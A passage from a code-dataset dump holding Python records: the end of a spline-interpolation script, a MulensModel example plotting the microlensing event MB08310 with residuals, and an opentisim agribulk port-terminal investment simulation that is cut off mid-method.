Dperp0_int, 'g', psi0_int, Dperp_new, 'r')\n#plt.show()\n\nfull_psi_min=1.04\nfull_psi_max=1.20\nfull_psi = (full_psi_max-full_psi_min) * np.random.random_sample((20)) + full_psi_min\nfull_psi = np.append([full_psi_min, full_psi_max], full_psi)\nfull_psi = np.sort(full_psi)\n\nfull_Dperp = (np.arange(len(full_psi))).astype(float)\nfull_Dperp.fill(np.max(Dperp_new))\n\nfull_psi = np.append(psi_int, full_psi)\nfull_Dperp = np.append(Dperp_new, full_Dperp)\n\nsmoothen1 = 0\ntck_Dperp = splrep(full_psi, full_Dperp, s=smoothen1)\n\nfull_psi_int = np.arange(0, 1.2+dpsi, dpsi)\nfull_Dperp_int = splev(full_psi_int, tck_Dperp, der=0)\n\noutput = np.transpose(np.array((full_psi_int, full_Dperp_int)))\nnp.savetxt('Dperp_profile_NEW.dat', output, fmt=\"%g\")\n","sub_path":"scripts/analysis_modified.py","file_name":"analysis_modified.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"421313657","text":"\"\"\"\nPlots data and model for MB08310 with residuals (no fitting).\n\nFrom `Janczak et al. 
2010, ApJ 711, 731\n`_.\n\n\"\"\"\nimport glob\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\n\nimport MulensModel as mm\n\n\n# Read in MB08310 data files (see data/MB08310) as MulensData objects.\n# Grabbing all data files in the MB08310 folder\nfiles = glob.glob(os.path.join(mm.DATA_PATH, \"photometry_files\",\n \"MB08310\", \"*.tbl\"))\n\ndatasets_default = []\nfor file_ in sorted(files):\n data = mm.MulensData(file_name=file_, comments=[\"\\\\\", \"|\"])\n datasets_default.append(data)\n\n# Define basic point lens model\nt_0 = 2454656.39975\nu_0 = 0.00300\nt_E = 11.14\nt_star = 0.05487\nplens_model = mm.Model({'t_0': t_0, 'u_0': u_0, 't_E': t_E, 't_star': t_star})\nmethod = 'finite_source_uniform_Gould94'\nplens_model.set_magnification_methods([t_0-.05, method, t_0+.05])\n\n# Combine the data and model into an event\nevent_default = mm.Event(datasets=datasets_default, model=plens_model)\nevent_default.data_ref = 6\n\ngs = gridspec.GridSpec(2, 1, height_ratios=[5, 1])\n\n# Plot the data and model\nplt.figure()\nplt.subplot(gs[0])\nevent_default.plot_model(subtract_2450000=True)\nevent_default.plot_data(subtract_2450000=True)\nplt.title('Data and Fitted Model (Default)')\n# Plot the residuals\nplt.subplot(gs[1])\nevent_default.plot_residuals(subtract_2450000=True)\n\n# -----------------\n# Plot the data and model (customized)\ndatasets_custom = []\ncolor_list = ['black', 'red', 'yellow', 'green', 'cyan', 'blue', 'purple']\nfor (i, file_) in enumerate(sorted(files)):\n data = mm.MulensData(\n file_name=file_, comments=[\"\\\\\", \"|\"],\n plot_properties={\n 'color': color_list[i],\n 'label': os.path.basename(file_).split('_', maxsplit=2)[0]})\n datasets_custom.append(data)\n\nevent_custom = mm.Event(datasets=datasets_custom, model=plens_model)\n\nplt.figure()\nplt.subplot(gs[0])\nt_start = t_0 - 3.\nt_stop = t_0 + 1.\nevent_custom.plot_model(\n color='black', t_start=t_start, t_stop=t_stop, subtract_2450000=True)\nevent_custom.plot_data(marker='s', markersize=3, subtract_2450000=True)\nplt.ylim(17.5, 12.5)\nplt.xlim(t_start-2450000., t_stop-2450000.)\nplt.legend(loc='upper left')\nplt.title('Data and Fitted Model (Custom)')\n\n# Plot the residuals\nplt.subplot(gs[1])\nevent_custom.plot_residuals(marker='s', markersize=3, subtract_2450000=True)\nplt.xlim(t_start-2450000., t_stop-2450000.)\n\nplt.show()\n","sub_path":"examples/example_05_MB08310.py","file_name":"example_05_MB08310.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"423357799","text":"# package(s) for data handling\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# opentisim package\nfrom opentisim.agribulk_objects import *\nfrom opentisim import agribulk_defaults\n\n\nclass System:\n def __init__(self, startyear=2019, lifecycle=20, operational_hours=5840, debug=False, elements=[],\n crane_type_defaults=agribulk_defaults.mobile_crane_data, storage_type_defaults=agribulk_defaults.silo_data,\n allowable_berth_occupancy=0.4, allowable_dwelltime=18 / 365, allowable_station_occupancy=0.4):\n # time inputs\n self.startyear = startyear\n self.lifecycle = lifecycle\n self.operational_hours = operational_hours\n\n # provide intermediate outputs via print statements if debug = True\n self.debug = debug\n\n # collection of all terminal objects\n self.elements = elements\n\n # default values to use in case various types can be selected\n self.crane_type_defaults = 
crane_type_defaults\n self.storage_type_defaults = storage_type_defaults\n\n # triggers for the various elements (berth, storage and station)\n self.allowable_berth_occupancy = allowable_berth_occupancy\n self.allowable_dwelltime = allowable_dwelltime\n self.allowable_station_occupancy = allowable_station_occupancy\n\n # storage variables for revenue\n self.revenues = []\n\n # *** Simulation engine\n\n def simulate(self):\n \"\"\" Terminal investment strategy simulation\n\n This method automatically generates investment decisions, parametrically derived from overall demand trends and\n a number of investment triggers.\n\n Based on:\n - Ijzermans, W., 2019. Terminal design optimization. Adaptive agribulk terminal planning\n in light of an uncertain future. Master's thesis. Delft University of Technology, Netherlands.\n URL: http://resolver.tudelft.nl/uuid:7ad9be30-7d0a-4ece-a7dc-eb861ae5df24.\n - Van Koningsveld, M. and J. P. M. Mulder. 2004. Sustainable Coastal Policy Developments in the\n Netherlands. A Systematic Approach Revealed. Journal of Coastal Research 20(2), pp. 375-385\n\n Apply frame of reference style decisions while stepping through each year of the terminal\n lifecycle and check if investment is needed (in light of strategic objective, operational objective,\n QSC, decision recipe, intervention method):\n\n 1. for each year evaluate the demand of each commodity\n 2. for each year evaluate the various investment decisions\n 3. for each year calculate the energy costs (requires insight in realized demands)\n 4. for each year calculate the demurrage costs (requires insight in realized demands)\n 5. for each year calculate terminal revenues\n 6. collect all cash flows (capex, opex, revenues)\n 7. calculate PV's and aggregate to NPV\n\n \"\"\"\n\n # # 1. for each year evaluate the demand of each commodity\n # for year in range(self.startyear, self.startyear + self.lifecycle):\n # self.calculate_demand_commodity(year)\n\n # 2. for each year evaluate the various investment decisions\n for year in range(self.startyear, self.startyear + self.lifecycle):\n \"\"\"\n strategic objective: create a profitable enterprise (NPV > 0)\n operational objective: provide infrastructure of just sufficient quality\n \"\"\"\n\n if self.debug:\n print('')\n print('Simulate year: {}'.format(year))\n\n # estimate traffic from commodity scenarios\n handysize, handymax, panamax, total_calls, total_vol = self.calculate_vessel_calls(year)\n if self.debug:\n print(' Total vessel calls: {}'.format(total_calls))\n print(' Handysize calls: {}'.format(handysize))\n print(' Handymax calls: {}'.format(handymax))\n print(' Panamax calls: {}'.format(panamax))\n print(' Total cargo volume: {}'.format(total_vol))\n\n self.berth_invest(year, handysize, handymax, panamax)\n\n self.conveyor_quay_invest(year,agribulk_defaults.quay_conveyor_data)\n\n self.storage_invest(year, self.storage_type_defaults)\n\n self.conveyor_hinter_invest(year,agribulk_defaults.hinterland_conveyor_data)\n\n self.unloading_station_invest(year)\n\n # 3. for each year calculate the energy costs (requires insight in realized demands)\n for year in range(self.startyear, self.startyear + self.lifecycle):\n self.calculate_energy_cost(year)\n\n # 4. for each year calculate the demurrage costs (requires insight in realized demands)\n self.demurrage = []\n for year in range(self.startyear, self.startyear + self.lifecycle):\n self.calculate_demurrage_cost(year)\n\n # 5. 
for each year calculate terminal revenues\n self.revenues = []\n for year in range(self.startyear, self.startyear + self.lifecycle):\n self.calculate_revenue(year)\n\n # 6. collect all cash flows (capex, opex, revenues)\n cash_flows, cash_flows_WACC_real = self.add_cashflow_elements()\n\n # 7. calculate PV's and aggregate to NPV\n self.NPV()\n\n def calculate_revenue(self, year):\n \"\"\"\n 1. calculate the value of the total demand in year (demand * handling fee)\n 2. calculate the maximum amount that can be handled (service capacity * operational hours)\n Terminal.revenues is the minimum of 1. and 2.\n \"\"\"\n # implement a safetymarge\n quay_walls = len(self.find_elements(Quay_wall))\n crane_cyclic = len(self.find_elements(Cyclic_Unloader))\n crane_continuous = len(self.find_elements(Continuous_Unloader))\n conveyor_quay = len(self.find_elements(Conveyor_Quay))\n storage = len(self.find_elements(Storage))\n conveyor_hinter = len(self.find_elements(Conveyor_Hinter))\n station = len(self.find_elements(Unloading_station))\n\n if quay_walls < 1 and conveyor_quay < 1 and (\n crane_cyclic > 1 or crane_continuous > 1) and storage < 1 and conveyor_hinter < 1 and station < 1:\n safety_factor = 0\n else:\n safety_factor = 1\n\n # maize = Commodity(**agribulk_defaults.maize_data)\n # wheat = Commodity(**agribulk_defaults.wheat_data)\n # soybeans = Commodity(**dagribulk_efaults.soybean_data)\n #\n # maize_demand, wheat_demand, soybeans_demand = self.calculate_demand_commodity(year)\n\n # gather volumes from each commodity, calculate how much revenue it would yield, and add\n revenues = 0\n for commodity in self.find_elements(Commodity):\n fee = commodity.handling_fee\n try:\n volume = commodity.scenario_data.loc[commodity.scenario_data['year'] == year]['volume'].item()\n revenues += (volume * fee * safety_factor)\n except:\n pass\n if self.debug:\n print(' Revenues (demand): {}'.format(revenues))\n\n handysize, handymax, panamax, total_calls, total_vol = self.calculate_vessel_calls(year)\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n\n # find the total service rate,\n service_rate = 0\n for element in (self.find_elements(Cyclic_Unloader) + self.find_elements(Continuous_Unloader)):\n if year >= element.year_online:\n service_rate += element.effective_capacity * crane_occupancy_online\n\n # find the rate between volume and throughput\n rate_throughput_volume = service_rate * self.operational_hours / total_vol\n\n if self.debug:\n print(' Revenues (throughput): {}'.format(\n int(service_rate * self.operational_hours * fee * safety_factor)))\n\n try:\n self.revenues.append(\n min(revenues * safety_factor, service_rate * self.operational_hours * fee * safety_factor))\n except:\n pass\n\n def calculate_energy_cost(self, year):\n \"\"\"\n 1. calculate the value of the total demand in year (demand * handling fee)\n 2. calculate the maximum amount that can be handled (service capacity * operational hours)\n Terminal.revenues is the minimum of 1. 
and 2.\n \"\"\"\n\n energy = Energy(**agribulk_defaults.energy_data)\n handysize, handymax, panamax, total_calls, total_vol = self.calculate_vessel_calls(year)\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n station_occupancy_planned, station_occupancy_online = self.calculate_station_occupancy(year)\n\n # calculate crane energy\n list_of_elements_1 = self.find_elements(Cyclic_Unloader)\n list_of_elements_2 = self.find_elements(Continuous_Unloader)\n list_of_elements_Crane = list_of_elements_1 + list_of_elements_2\n\n for element in list_of_elements_Crane:\n if year >= element.year_online:\n consumption = element.consumption\n hours = self.operational_hours * crane_occupancy_online\n\n if consumption * hours * energy.price != np.inf:\n element.df.loc[element.df['year'] == year, 'energy'] = consumption * hours * energy.price\n\n else:\n element.df.loc[element.df['year'] == year, 'energy'] = 0\n\n # calculate Quay conveyor energy\n list_of_elements_quay = self.find_elements(Conveyor_Quay)\n\n for element in list_of_elements_quay:\n if year >= element.year_online:\n consumption = element.capacity_steps * element.consumption_coefficient + element.consumption_constant\n hours = self.operational_hours * crane_occupancy_online\n\n if consumption * hours * energy.price != np.inf:\n element.df.loc[element.df['year'] == year, 'energy'] = consumption * hours * energy.price\n\n else:\n element.df.loc[element.df['year'] == year, 'energy'] = 0\n\n # calculate storage energy\n list_of_elements_Storage = self.find_elements(Storage)\n\n for element in list_of_elements_Storage:\n if year >= element.year_online:\n consumption = element.consumption\n capacity = element.capacity\n hours = self.operational_hours\n\n if consumption * capacity * hours * energy.price != np.inf:\n element.df.loc[element.df['year'] == year, 'energy'] = consumption * capacity * hours * energy.price\n\n else:\n element.df.loc[element.df['year'] == year, 'energy'] = 0\n\n # calculate hinterland conveyor energy\n list_of_elements_hinter = self.find_elements(Conveyor_Hinter)\n\n for element in list_of_elements_hinter:\n if year >= element.year_online:\n consumption = element.capacity_steps * element.consumption_coefficient + element.consumption_constant\n hours = self.operational_hours * station_occupancy_online\n\n if consumption * hours * energy.price != np.inf:\n element.df.loc[element.df['year'] == year, 'energy'] = consumption * hours * energy.price\n\n else:\n element.df.loc[element.df['year'] == year, 'energy'] = 0\n\n # calculate hinterland station energy\n station_occupancy_planned, station_occupancy_online = self.calculate_station_occupancy(year)\n\n list_of_elements_Station = self.find_elements(Unloading_station)\n\n for element in list_of_elements_Station:\n if year >= element.year_online:\n\n if element.consumption * self.operational_hours * station_occupancy_online * energy.price != np.inf:\n element.df.loc[element.df['year'] == year, 'energy'\n ] = element.consumption * self.operational_hours * station_occupancy_online * energy.price\n\n else:\n element.df.loc[element.df['year'] == year, 'energy'] = 0\n\n def calculate_demurrage_cost(self, year):\n\n \"\"\"Find the demurrage cost per type of vessel and sum all demurrage cost\"\"\"\n\n handysize_calls, handymax_calls, panamax_calls, total_calls, total_vol = self.calculate_vessel_calls(year)\n\n factor, waiting_time_occupancy = 
self.waiting_time(year)\n\n # Find the service_rate per quay_wall to find the average service hours at the quay for a vessel\n quay_walls = len(self.find_elements(Quay_wall))\n\n service_rate = 0\n for element in (self.find_elements(Cyclic_Unloader) + self.find_elements(Continuous_Unloader)):\n if year >= element.year_online:\n service_rate += element.effective_capacity / quay_walls\n\n # Find the demurrage cost per type of vessel\n if service_rate != 0:\n handymax = Vessel(**agribulk_defaults.handymax_data)\n service_time_handymax = handymax.call_size / service_rate\n waiting_time_hours_handymax = factor * service_time_handymax\n port_time_handymax = waiting_time_hours_handymax + service_time_handymax + handymax.mooring_time\n penalty_time_handymax = max(0, waiting_time_hours_handymax - handymax.all_turn_time)\n demurrage_time_handymax = penalty_time_handymax * handymax_calls\n demurrage_cost_handymax = demurrage_time_handymax * handymax.demurrage_rate\n\n handysize = Vessel(**agribulk_defaults.handysize_data)\n service_time_handysize = handysize.call_size / service_rate\n waiting_time_hours_handysize = factor * service_time_handysize\n port_time_handysize = waiting_time_hours_handysize + service_time_handysize + handysize.mooring_time\n penalty_time_handysize = max(0, waiting_time_hours_handysize - handysize.all_turn_time)\n demurrage_time_handysize = penalty_time_handysize * handysize_calls\n demurrage_cost_handysize = demurrage_time_handysize * handysize.demurrage_rate\n\n panamax = Vessel(**agribulk_defaults.panamax_data)\n service_time_panamax = panamax.call_size / service_rate\n waiting_time_hours_panamax = factor * service_time_panamax\n port_time_panamax = waiting_time_hours_panamax + service_time_panamax + panamax.mooring_time\n penalty_time_panamax = max(0, waiting_time_hours_panamax - panamax.all_turn_time)\n demurrage_time_panamax = penalty_time_panamax * panamax_calls\n demurrage_cost_panamax = demurrage_time_panamax * panamax.demurrage_rate\n\n else:\n demurrage_cost_handymax = 0\n demurrage_cost_handysize = 0\n demurrage_cost_panamax = 0\n\n total_demurrage_cost = demurrage_cost_handymax + demurrage_cost_handysize + demurrage_cost_panamax\n\n self.demurrage.append(total_demurrage_cost)\n\n # *** Investment functions\n\n def berth_invest(self, year, handysize, handymax, panamax):\n \"\"\"\n Given the overall objectives of the terminal\n\n Decision recipe Berth:\n QSC: berth_occupancy\n Problem evaluation: there is a problem if the berth_occupancy > allowable_berth_occupancy\n - allowable_berth_occupancy = .40 # 40%\n - a berth needs:\n - a quay\n - cranes (min:1 and max: max_cranes)\n - berth occupancy depends on:\n - total_calls and total_vol\n - total_service_capacity as delivered by the cranes\n Investment decisions: invest enough to make the berth_occupancy < allowable_berth_occupancy\n - adding quay and cranes decreases berth_occupancy_rate\n \"\"\"\n\n # report on the status of all berth elements\n self.report_element(Berth, year)\n self.report_element(Quay_wall, year)\n self.report_element(Cyclic_Unloader, year)\n self.report_element(Continuous_Unloader, year)\n self.report_element(Conveyor_Quay, year)\n self.report_element(Storage, year)\n self.report_element(Conveyor_Hinter, year)\n self.report_element(Unloading_station, year)\n if self.debug:\n print('')\n print(' Start analysis:')\n\n # calculate berth occupancy\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, 
handymax, panamax)\n factor, waiting_time_occupancy = self.waiting_time(year)\n if self.debug:\n print(' Berth occupancy planned (@ start of year): {}'.format(berth_occupancy_planned))\n print(' Berth occupancy online (@ start of year): {}'.format(berth_occupancy_online))\n print(' Crane occupancy planned (@ start of year): {}'.format(crane_occupancy_planned))\n print(' Crane occupancy online (@ start of year): {}'.format(crane_occupancy_online))\n print(' waiting time factor (@ start of year): {}'.format(factor))\n print(' waiting time occupancy (@ start of year): {}'.format(waiting_time_occupancy))\n\n while berth_occupancy_planned > self.allowable_berth_occupancy:\n\n # add a berth when no crane slots are available\n if not (self.check_crane_slot_available()):\n if self.debug:\n print(' *** add Berth to elements')\n berth = Berth(**agribulk_defaults.berth_data)\n berth.year_online = year + berth.delivery_time\n self.elements.append(berth)\n\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n if self.debug:\n print(' Berth occupancy planned (after adding berth): {}'.format(berth_occupancy_planned))\n print(' Berth occupancy online (after adding berth): {}'.format(berth_occupancy_online))\n\n # check if a quay is needed\n berths = len(self.find_elements(Berth))\n quay_walls = len(self.find_elements(Quay_wall))\n if berths > quay_walls:\n length_v = max(agribulk_defaults.handysize_data[\"LOA\"],agribulk_defaults.handymax_data[\"LOA\"],\n agribulk_defaults.panamax_data[\"LOA\"]) # average size\n draft = max(agribulk_defaults.handysize_data[\"draft\"],agribulk_defaults.handymax_data[\"draft\"],\n agribulk_defaults.panamax_data[\"draft\"])\n # apply PIANC 2014:\n # see Ijzermans, 2019 - infrastructure.py line 107 - 111\n if quay_walls == 0:\n # - length when next quay is n = 1\n length = length_v + 2 * 15 # ref: PIANC 2014\n elif quay_walls == 1:\n # - length when next quay is n > 1\n length = 1.1 * berths * (length_v + 15) - (length_v + 2 * 15) # ref: PIANC 2014\n else:\n length = 1.1 * berths * (length_v + 15) - 1.1 * (berths - 1) * (length_v + 15)\n\n # - depth\n quay_wall = Quay_wall(**agribulk_defaults.quay_wall_data)\n depth = np.sum([draft, quay_wall.max_sinkage, quay_wall.wave_motion, quay_wall.safety_margin])\n self.quay_invest(year, length, depth)\n\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n if self.debug:\n print(' Berth occupancy planned (after adding quay): {}'.format(berth_occupancy_planned))\n print(' Berth occupancy online (after adding quay): {}'.format(berth_occupancy_online))\n\n # check if a crane is needed\n if self.check_crane_slot_available():\n self.crane_invest(year)\n\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n if self.debug:\n print(' Berth occupancy planned (after adding crane): {}'.format(berth_occupancy_planned))\n print(' Berth occupancy online (after adding crane): {}'.format(berth_occupancy_online))\n\n def quay_invest(self, year, length, depth):\n \"\"\"\n *** Decision recipe Quay: ***\n QSC: quay_per_berth\n problem evaluation: there is a problem if the quay_per_berth < 1\n investment decisions: invest enough to make the quay_per_berth = 1\n - adding quay will increase quay_per_berth\n 
- quay_wall.length must be long enough to accommodate largest expected vessel\n - quay_wall.depth must be deep enough to accommodate largest expected vessel\n - quay_wall.freeboard must be high enough to accommodate largest expected vessel\n \"\"\"\n\n if self.debug:\n print(' *** add Quay to elements')\n # add a Quay_wall element\n\n quay_wall = Quay_wall(**agribulk_defaults.quay_wall_data)\n\n # - capex\n unit_rate = int(quay_wall.Gijt_constant_2 * 2 * (depth + quay_wall.freeboard))\n mobilisation = int(max((length * unit_rate * quay_wall.mobilisation_perc), quay_wall.mobilisation_min))\n quay_wall.capex = int(length * unit_rate + mobilisation)\n\n # - opex\n quay_wall.insurance = unit_rate * length * quay_wall.insurance_perc\n quay_wall.maintenance = unit_rate * length * quay_wall.maintenance_perc\n quay_wall.year_online = year + quay_wall.delivery_time\n\n # add cash flow information to quay_wall object in a dataframe\n quay_wall = self.add_cashflow_data_to_element(quay_wall)\n\n self.elements.append(quay_wall)\n\n def crane_invest(self, year):\n \"\"\"current strategy is to add cranes as soon as a service trigger is achieved\n - find out how much service capacity is online\n - find out how much service capacity is planned\n - find out how much service capacity is needed\n - add service capacity until service_trigger is no longer exceeded\n \"\"\"\n if self.debug:\n print(' *** add Harbour crane to elements')\n # add unloader object\n if (self.crane_type_defaults[\"crane_type\"] == 'Gantry crane' or\n self.crane_type_defaults[\"crane_type\"] == 'Harbour crane' or\n self.crane_type_defaults[\"crane_type\"] == 'Mobile crane'):\n crane = Cyclic_Unloader(**self.crane_type_defaults)\n elif self.crane_type_defaults[\"crane_type\"] == 'Screw unloader':\n crane = Continuous_Unloader(**self.crane_type_defaults)\n\n # - capex\n unit_rate = crane.unit_rate\n mobilisation = unit_rate * crane.mobilisation_perc\n crane.capex = int(unit_rate + mobilisation)\n\n # - opex\n crane.insurance = unit_rate * crane.insurance_perc\n crane.maintenance = unit_rate * crane.maintenance_perc\n\n # labour\n labour = Labour(**agribulk_defaults.labour_data)\n '''old formula --> crane.labour = crane.crew * self.operational_hours / labour.shift_length '''\n crane.shift = ((crane.crew * self.operational_hours) / (\n labour.shift_length * labour.annual_shifts))\n crane.labour = crane.shift * labour.operational_salary\n\n # apply proper timing for the crane to come online (in the same year as the latest Quay_wall)\n years_online = []\n for element in self.find_elements(Quay_wall):\n years_online.append(element.year_online)\n crane.year_online = max([year + crane.delivery_time, max(years_online)])\n\n # add cash flow information to quay_wall object in a dataframe\n crane = self.add_cashflow_data_to_element(crane)\n\n # add object to elements\n self.elements.append(crane)\n\n def conveyor_quay_invest(self, year, agribulk_defaults_quay_conveyor_data):\n \"\"\"current strategy is to add conveyors as soon as a service trigger is achieved\n - find out how much service capacity is online\n - find out how much service capacity is planned\n - find out how much service capacity is needed\n - add service capacity until service_trigger is no longer exceeded\n \"\"\"\n\n # find the total service rate\n service_capacity = 0\n service_capacity_online = 0\n list_of_elements = self.find_elements(Conveyor_Quay)\n if list_of_elements != []:\n for element in list_of_elements:\n service_capacity += element.capacity_steps\n if year >= 
element.year_online:\n service_capacity_online += element.capacity_steps\n\n if self.debug:\n print(' a total of {} ton of quay conveyor service capacity is online; {} ton total planned'.format(\n service_capacity_online, service_capacity))\n\n # find the total service rate,\n service_rate = 0\n years_online = []\n for element in (self.find_elements(Cyclic_Unloader) + self.find_elements(Continuous_Unloader)):\n service_rate += element.peak_capacity\n years_online.append(element.year_online)\n\n # check if total planned capacity is smaller than target capacity, if so add a conveyor\n while service_capacity < service_rate:\n if self.debug:\n print(' *** add Quay Conveyor to elements')\n conveyor_quay = Conveyor_Quay(**agribulk_defaults_quay_conveyor_data)\n\n # - capex\n capacity = conveyor_quay.capacity_steps\n unit_rate = conveyor_quay.unit_rate_factor * conveyor_quay.length\n mobilisation = conveyor_quay.mobilisation\n conveyor_quay.capex = int(capacity * unit_rate + mobilisation)\n\n # - opex\n conveyor_quay.insurance = capacity * unit_rate * conveyor_quay.insurance_perc\n conveyor_quay.maintenance = capacity * unit_rate * conveyor_quay.maintenance_perc\n\n # labour\n labour = Labour(**agribulk_defaults.labour_data)\n conveyor_quay.shift = (\n (conveyor_quay.crew * self.operational_hours) / (labour.shift_length * labour.annual_shifts))\n conveyor_quay.labour = conveyor_quay.shift * labour.operational_salary\n\n # # apply proper timing for the crane to come online (in the same year as the latest Quay_wall)\n\n # there should always be a new crane in the planning\n new_crane_years = [x for x in years_online if x >= year]\n\n # find the maximum online year of Conveyor_Quay or make it []\n if self.find_elements(Conveyor_Quay) != []:\n max_conveyor_years = max([x.year_online for x in self.find_elements(Conveyor_Quay)])\n else:\n max_conveyor_years = []\n\n # decide what online year to use\n if max_conveyor_years == []:\n conveyor_quay.year_online = min(new_crane_years)\n elif max_conveyor_years < min(new_crane_years):\n conveyor_quay.year_online = min(new_crane_years)\n elif max_conveyor_years == min(new_crane_years):\n conveyor_quay.year_online = max(new_crane_years)\n elif max_conveyor_years > min(new_crane_years):\n conveyor_quay.year_online = max(new_crane_years)\n\n # add cash flow information to quay_wall object in a dataframe\n conveyor_quay = self.add_cashflow_data_to_element(conveyor_quay)\n\n self.elements.append(conveyor_quay)\n\n service_capacity += conveyor_quay.capacity_steps\n\n if self.debug:\n print(' a total of {} ton of conveyor quay service capacity is online; {} ton total planned'.format(\n service_capacity_online, service_capacity))\n\n def storage_invest(self, year, agribulk_defaults_storage_data):\n \"\"\"current strategy is to add storage as long as target storage is not yet achieved\n - find out how much storage is online\n - find out how much storage is planned\n - find out how much storage is needed\n - add storage until target is reached\n \"\"\"\n\n # from all storage objects sum online capacity\n storage_capacity = 0\n storage_capacity_online = 0\n list_of_elements = self.find_elements(Storage)\n if list_of_elements != []:\n for element in list_of_elements:\n if element.type == agribulk_defaults_storage_data['type']:\n storage_capacity += element.capacity\n if year >= element.year_online:\n storage_capacity_online += element.capacity\n\n if self.debug:\n print(' a total of {} ton of {} storage capacity is online; {} ton total planned'.format(\n 
storage_capacity_online, agribulk_defaults_storage_data['type'], storage_capacity))\n\n handysize, handymax, panamax, total_calls, total_vol = self.calculate_vessel_calls(year)\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n\n max_vessel_call_size = max([x.call_size for x in self.find_elements(Vessel)])\n\n # find the total service rate,\n service_rate = 0\n for element in (self.find_elements(Cyclic_Unloader) + self.find_elements(Continuous_Unloader)):\n if year >= element.year_online:\n service_rate += element.effective_capacity * crane_occupancy_online\n\n storage_capacity_dwelltime = (\n service_rate * self.operational_hours * self.allowable_dwelltime) * 1.1 # IJzerman p.26\n\n # check if sufficient storage capacity is available\n while storage_capacity < max_vessel_call_size or storage_capacity < storage_capacity_dwelltime:\n if self.debug:\n print(' *** add storage to elements')\n\n # add storage object\n storage = Storage(**agribulk_defaults_storage_data)\n\n # - capex\n storage.capex = storage.unit_rate * storage.capacity + storage.mobilisation_min\n\n # - opex\n storage.insurance = storage.unit_rate * storage.capacity * storage.insurance_perc\n storage.maintenance = storage.unit_rate * storage.capacity * storage.maintenance_perc\n\n # labour**agribulk_defaults\n labour = Labour(**agribulk_defaults.labour_data)\n storage.shift = ((storage.crew * self.operational_hours) / (labour.shift_length * labour.annual_shifts))\n storage.labour = storage.shift * labour.operational_salary\n\n if year == self.startyear:\n storage.year_online = year + storage.delivery_time + 1\n else:\n storage.year_online = year + storage.delivery_time\n\n # add cash flow information to quay_wall object in a dataframe\n storage = self.add_cashflow_data_to_element(storage)\n\n self.elements.append(storage)\n\n storage_capacity += storage.capacity\n\n if self.debug:\n print(\n ' a total of {} ton of storage capacity is online; {} ton total planned'.format(\n storage_capacity_online,\n storage_capacity))\n\n def conveyor_hinter_invest(self, year, agribulk_defaults_hinterland_conveyor_data):\n \"\"\"current strategy is to add conveyors as soon as a service trigger is achieved\n - find out how much service capacity is online\n - find out how much service capacity is planned\n - find out how much service capacity is needed\n - add service capacity until service_trigger is no longer exceeded\n \"\"\"\n\n # find the total service rate\n service_capacity = 0\n service_capacity_online_hinter = 0\n list_of_elements_conveyor = self.find_elements(Conveyor_Hinter)\n if list_of_elements_conveyor != []:\n for element in list_of_elements_conveyor:\n service_capacity += element.capacity_steps\n if year >= element.year_online:\n service_capacity_online_hinter += element.capacity_steps\n\n if self.debug:\n print(\n ' a total of {} ton of conveyor hinterland service capacity is online; {} ton total planned'.format(\n service_capacity_online_hinter, service_capacity))\n\n # find the total service rate,\n service_rate = 0\n years_online = []\n for element in (self.find_elements(Unloading_station)):\n service_rate += element.production\n years_online.append(element.year_online)\n\n # check if total planned length is smaller than target length, if so add a quay\n while service_rate > service_capacity:\n if self.debug:\n print(' *** add Hinter Conveyor to elements')\n conveyor_hinter = 
Conveyor_Hinter(**agribulk_defaults_hinterland_conveyor_data)\n\n # - capex\n capacity = conveyor_hinter.capacity_steps\n unit_rate = conveyor_hinter.unit_rate_factor * conveyor_hinter.length\n mobilisation = conveyor_hinter.mobilisation\n conveyor_hinter.capex = int(capacity * unit_rate + mobilisation)\n\n # - opex\n conveyor_hinter.insurance = capacity * unit_rate * conveyor_hinter.insurance_perc\n conveyor_hinter.maintenance = capacity * unit_rate * conveyor_hinter.maintenance_perc\n\n # - labour\n labour = Labour(**agribulk_defaults.labour_data)\n conveyor_hinter.shift = (\n (conveyor_hinter.crew * self.operational_hours) / (labour.shift_length * labour.annual_shifts))\n conveyor_hinter.labour = conveyor_hinter.shift * labour.operational_salary\n\n # - online year\n conveyor_hinter.year_online = max(years_online)\n\n # add cash flow information to quay_wall object in a dataframe\n conveyor_hinter = self.add_cashflow_data_to_element(conveyor_hinter)\n\n self.elements.append(conveyor_hinter)\n\n service_capacity += conveyor_hinter.capacity_steps\n\n if self.debug:\n print(\n ' a total of {} ton of conveyor hinterland service capacity is online; {} ton total planned'.format(\n service_capacity_online_hinter, service_capacity))\n\n def unloading_station_invest(self, year):\n \"\"\"current strategy is to add unloading stations as soon as a service trigger is achieved\n - find out how much service capacity is online\n - find out how much service capacity is planned\n - find out how much service capacity is needed\n - add service capacity until service_trigger is no longer exceeded\n \"\"\"\n\n station_occupancy_planned, station_occupancy_online = self.calculate_station_occupancy(year)\n train_calls = self.train_call(year)\n\n if self.debug:\n print(' Station occupancy planned (@ start of year): {}'.format(station_occupancy_planned))\n print(' Station occupancy online (@ start of year): {}'.format(station_occupancy_online))\n print(' Number of trains (@start of year): {}'.format(train_calls))\n\n while station_occupancy_planned > self.allowable_station_occupancy:\n # add a station when station occupancy is too high\n if self.debug:\n print(' *** add station to elements')\n\n station = Unloading_station(**agribulk_defaults.hinterland_station_data)\n\n # - capex\n unit_rate 